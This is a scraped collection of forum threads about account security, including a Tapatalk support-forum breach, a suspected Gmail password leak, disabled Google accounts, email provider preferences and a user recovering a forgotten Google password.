Just got an email regarding a security breach at Tapatalk which may have exposed names, email addresses and passwords (especially if you have logged in since December 9th. I haven't seen anything posted here so my apologies if this is a repost but I'm in a rush and figured it was worth the risk.
update
southygov said:
Just got an email regarding a security breach at Tapatalk which may have exposed names, email addresses and passwords (especially if you have logged in since December 9th. I haven't seen anything posted here so my apologies if this is a repost but I'm in a rush and figured it was worth the risk.
Click to expand...
Click to collapse
I'm sure someone will make something available soon. The bottom line was that someone exploited some third party wordpress plugin that was running the blog which allowed access to the access and forum on the support site. the rest of the tapatalk systems were *not* affected. Xenforo was modified to stream cleartext $_POST data off to a server in Sweden. A new server was created, reinstalled and the xenforo database imported from 6 days ago prior to the intrusion. The tapatalk app and forum plugins were not on this box as auditing to do shows not sign of any intrusion past the support forum server.
So is the breach affecting only those WITH Tapatalk account... OR.... Tapatalk host all the other forums accounts (XDA, Android Central, etc.) and those are affected?
I don't have Tapatalk account. Every time I re-install the app, I re-enter the forums (i.e. XDA) account one by one.
lanwarrior said:
So is the breach affecting only those WITH Tapatalk account... OR.... Tapatalk host all the other forums accounts (XDA, Android Central, etc.) and those are affected?
I don't have Tapatalk account. Every time I re-install the app, I re-enter the forums (i.e. XDA) account one by one.
Click to expand...
Click to collapse
It was only if you had an account on the support forums as only that system was affected. Any app logins to any other sites weren't affected, unless you used the same password and email account over several sites. If you last logged into the support forums prior to 10th of December then only encrypted passwords were disclosed. The support forum runs its own authentication mechanism and is completely separate from the forum admin control panel / app / plugins
edit - to add, the code exploited was in wordpress, NOT in XenForo. The Xenforo source code was only altered *after* wordpress was exploited. This is how cleartext passwords were made available.
Related
I've had a GMail account for years, and never once had a problem. I recently got an Android phone, and started getting GMail delivery failures for emails about "acai berry" slimming, which obviously is spam I didnt send. As a developer, I can understand that servers can be hacked, and nothing is perfect.
Earlier in the week I couldn't check my GMail email from my Android phone. I then logged in from my PC & was told there was suspicious activity. I got an access code sent by SMS & reset my password. I then checked the suspicious activity & found 2 accesses to my account from Poland. Definately not me. I still thought someone had hacked the server.
But last night alarm bells started ringing. I was running some API example code in Eclipse through the debugger on the emulator, and saw in the LogCat window some messages about permissions being requested by the app. One of them being requested was "ACCESS_GMAIL_PASSWORD" (may not have been the exact wording - I forgot to make a note of it) but it definately said GMAIL & PASSWORD in the permission name.
Now it was only in the Emulator, which didnt have any personal info in it. But when installing apps from the Marketplace on my real phone, I always check the permissions very carefully & wouldnt have installed anything that requested my GMail password. I cant believe Google would have provided API methods to access my GMail password ? Is this right ? Is it possible for an app to do so without me knowing it has permission to do so ? If its possible, I may have to reconsider using GMail.
Thanks for any feedback.
Well some apps do actually require the Google login credentials. Like appbrain for example. And I've been using appvrain forever with no problem.
Sent from my DROIDX using Tapatalk
Yeah, but shouldn't we be aware of these permissions when we are installing. I know I haven't installed any apps that explicitly said they would access my GMail account.
Well I've checked for the following applications I've got on my phone and that use Gmail password:
- Android Market
- Chrome to Phone
- Gmail
- Google Reader
- GTasks
- Google Maps
and for all of them in the Authorisations list it is clearly written "Use an account authentification information" (I've translated from what I read in French so it may not be the exact wording in English).
So IMO if you use at least Android Market and Gmail application you have inevitably given access to your Gmail password.
On that list I have
- Android Market
- GMail
- Google Maps
All were pre-installed on the phone. Also, I trust the authors of these pieces of software. The problem is my GMail account has been accessed by a spammer sending "Acai berry" slimming emails. I dont think Google would misuse my GMail password for this purpose.
I am more concerned that I have been downloading apps from the Marketplace & one of them got my GMail password. I realise that apps have "Full internet access" when they are ad sponsored, I suspect a rogue app accessed my GMail password & then used its internet access to send the password to a spammer.
I have several apps from sources I dont fully trust, with "Full Internet Access". But I dont have any that asked for Account Authorisation when installed.
Is there any way I can recheck what apps can access my GMail password ?
Thanks.
There is an app on the market called task identifier that should help you out.
Sent from my DROIDX using Tapatalk
Looks exactly what I'm after. Thanks.
gungh0 said:
Looks exactly what I'm after. Thanks.
Click to expand...
Click to collapse
No problem. Good luck with it all.
Sent from my DROIDX using Tapatalk
Hi everybody,
I have a little problem with my Google Account. About 1 year ago, my account (alessio.buccoliero) has been disabled. I've created a new one (alessio.buccoliero.new), and it has been disabled too. At that point, I've created a new one, changing the name, and it worked for a while, until yesterday (disabled). I need a Google Account because I have an Android Phone but I don't want to create one every 3 months. If I try to contact Google, they don't reply to me and don't explain why they disabled the account.
I don't use Google services in any wrong way, AFAIK, but I noticed that the ban occurs when I try to upload photos on Picasa or use Google Drive (recently) or Google+.
Does anybody know if Google uses a sort of "blacklist" of users that have been banned once or more time in order to disable their account recursively?
Does anybody experienced the same problem?
Any help is welcome.
Thanks in advance,
Alessio
Same thing happened to my friend today for no reason. Not sure how to fix it :-\
Mmmh, thank you. It's very strange...
Anyone else?
Alessio
What is the message that tells you it is disabled? And when do you get that message?
Sent from my GT-I9100 using XDA
What is your banned Message ?
There is a high relevance to the actual email or notification or email address you set as your original email address when creating gmail account
now your secondary email should have a mail from google telling you why you were banned
When I try to login with my credentials I'm redirected to a page that contains this message.
Account has been disabled
If you've been redirected to this page from the sign-in page, it means that access to your Google Account has been disabled.
In most cases, accounts are disabled if we believe you have violated either the Google Terms of Service , product-specific Terms of Service (available on the product page), or product-specific policies. Your account has not been deleted, your data is still intact, and it might be possible to regain access to your account.
Why Google disables accounts
Google wants to ensure that everyone has a chance to safely and securely connect and communicate. To help preserve this environment, Google reserves the right to:
Suspend a Google Account from using a particular product or the entire Google Accounts system if there is a violation of the Google Terms of Service , product-specific Terms of Service (available on the product page), or product-specific policies.
Terminate your account at any time, for any reason, with or without notice.
Next steps for disabled accounts
Please start by reviewing the relevant Terms of Service. Then, if you think your account should not have been disabled, please contact us.
Click to expand...
Click to collapse
I tried to send them emails and messages but they don't reply to me and I have no messages from google in my secondary mailbox (the one I've provided when set up the account).
Really, don't know what is happening...
I'm just curious what everyone uses most for day to day? Your email accounts that come included with your home internet or online services like Gmail and Hotmail?
I have 2 email accounts on my ISP that I use for most stuff. My Gmail account tied to my phone I only use for Google Play and nothing else. The reason I prefer using my ISP email is because it's less popular and less prone to datamining by big online entities like Google or MS and they're just as disposable. I guess I feel a little better deep inside letting Rogers spy on my activities than an international giant online entity.
For example, I'll use my ISP email accounts to sign up for PayPal, dropbox, eBay etc rather than Gmail.
Just curious what others prefer
Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
Of course, there are many times when I also create a spam-drop address for web-site sign-ups.
Gmail. I have my own domains as well, and use them on Google Apps.
It's convenient. I've been using my gmail since near the start of gmail and there's no reason to really change it.
SimonTS said:
Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
Of course, there are many times when I also create a spam-drop address for web-site sign-ups.
Click to expand...
Click to collapse
+1
I have my own server so I'm in total control of what I can do.
One gmail and then my own domain for the other addresses i need work etc.
Sent from my GT-N7000 using xda premium
Im rocking hotmail
Sent from my GT-I9100 using Tapatalk 2
SimonTS said:
Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
Of course, there are many times when I also create a spam-drop address for web-site sign-ups.
Click to expand...
Click to collapse
How does the search function work on that? I think Gmail has surpased hotmail as it is really easy to use and groups emails together. I never thought I would switch to gmail but it seems superior at the moment.
PassingExpert said:
How does the search function work on that? I think Gmail has surpased hotmail as it is really easy to use and groups emails together. I never thought I would switch to gmail but it seems superior at the moment.
Click to expand...
Click to collapse
Hotmail has this thing called Outlook.com which resembles Gmail
Sent from my GT-I9100 using Tapatalk 2
PassingExpert said:
How does the search function work on that? I think Gmail has surpased hotmail as it is really easy to use and groups emails together. I never thought I would switch to gmail but it seems superior at the moment.
Click to expand...
Click to collapse
Outlook.com is more in line with what Gmail has to offer. MS is finally rebranding and doing away with Hotmail. I like how you can create a throwaway email addy in an instant.
Recently setup an outlook.com address and thinking if migrating to that from gmail. A few articles I have read indicate that MS will be taking users privacy a little more seriously than google does.
Sent from my cm_tenderloin using Tapatalk 2
migrating webmail services?
wiggerbrand said:
Recently setup an outlook.com address and thinking if migrating to that from gmail. A few articles I have read indicate that MS will be taking users privacy a little more seriously than google does.
Sent from my cm_tenderloin using Tapatalk 2
Click to expand...
Click to collapse
How long have you been using g-mail???
I can't imagine it would be easy to migrate
Slotty_AU said:
How long have you been using g-mail???
I can't imagine it would be easy to migrate
Click to expand...
Click to collapse
It's REAL easy, I used gmail for 4 years and it took me 2 days to get used to Hotmail
Sent from my GT-I9100 using Tapatalk 2
Androied and Gmail, changes and challenges
To make it as simple as possible:
I registered my accound and bound it to certain gmail address that I use for basically everything.
When I log in using my ACCOUNT NAME, it redirects me to this account. But when I use GOOGLE+ login form, it logs me into some wierd new account called bill pap CLICK ME, despite the fact that my gmail is bound to Amadeusz90.
What is going on, did somebody try to hijack my mail/XDA account? How the hell do I get redirected to some weird account while using my own e-mail?
Can you give it a look, XDA team? Thanks in advance.
Amadeusz90 said:
To make it as simple as possible:
I registered my accound and bound it to certain gmail address that I use for basically everything.
When I log in using my ACCOUNT NAME, it redirects me to this account. But when I use GOOGLE+ login form, it logs me into some wierd new account called bill pap CLICK ME, despite the fact that my gmail is bound to Amadeusz90.
What is going on, did somebody try to hijack my mail/XDA account? How the hell do I get redirected to some weird account while using my own e-mail?
Can you give it a look, XDA team? Thanks in advance.
Click to expand...
Click to collapse
Hello,
It seems like your browser is at fault. Try a different one or clear cache and try again.
Regards
Vatsal,
Forum Moderator.
Hey buddies, I'm looking for some help
Basically I changed the pass of my main Google account one week ago being sure that my browser saved it like I always do but it didn't happen.
I forgot it (prob I'm missing some words) and I can't retrieve it because Google is a ***** one, I tried many times to recover it fullfilling all the camps but I can't complete the recovery mail one since the mail that i I linked with the acc is expired somehow
So I'm looking for a way to recover the pass directly from the phone since I'm still logged in there, I tried with sniffing packets within my wifi but I got nothing and with looking for some database but nothing again
Any ideas or software that can help me out?
h320 said:
Hey buddies, I'm looking for some help
Basically I changed the pass of my main Google account one week ago being sure that my browser saved it like I always do but it didn't happen.
I forgot it (prob I'm missing some words) and I can't retrieve it because Google is a ***** one, I tried many times to recover it fullfilling all the camps but I can't complete the recovery mail one since the mail that i I linked with the acc is expired somehow
So I'm looking for a way to recover the pass directly from the phone since I'm still logged in there, I tried with sniffing packets within my wifi but I got nothing and with looking for some database but nothing again
Any ideas or software that can help me out?
Click to expand...
Click to collapse
There is no need to use software or any kind of "hack" to recover the password if your are signed into the device with that account, as you claim you are.
If you're signed into the phone with the same Google account, use the "forgot password" feature, it will send an email to your gmail account, then just open the gmail app on the device and then find the email they send to change the password. If you are signed into the device with that account then you have access to the gmail app and the email for that account so this method should be sufficient.
Sent from my LGL84VL using Tapatalk
Droidriven said:
There is no need to use software or any kind of "hack" to recover the password if your are signed into the device with that account, as you claim you are.
If you're signed into the phone with the same Google account, use the "forgot password" feature, it will send an email to your gmail account, then just open the gmail app on the device and then find the email they send to change the password. If you are signed into the device with that account then you have access to the gmail app and the email for that account so this method should be sufficient.
Sent from my LGL84VL using Tapatalk
Click to expand...
Click to collapse
Hello mate, thanks for you reply.
Yes, I'm logged into my main phone with the account that I'm trying to recover. If I do the "forgot password" feature from the browser or from the phone directly it will ask me the same things like it already did. I can complete all steps apart the mail one since the recovery mail is expired (my bad that I didn't change it).
For that I'm looking for some software/tricky way.
Regards.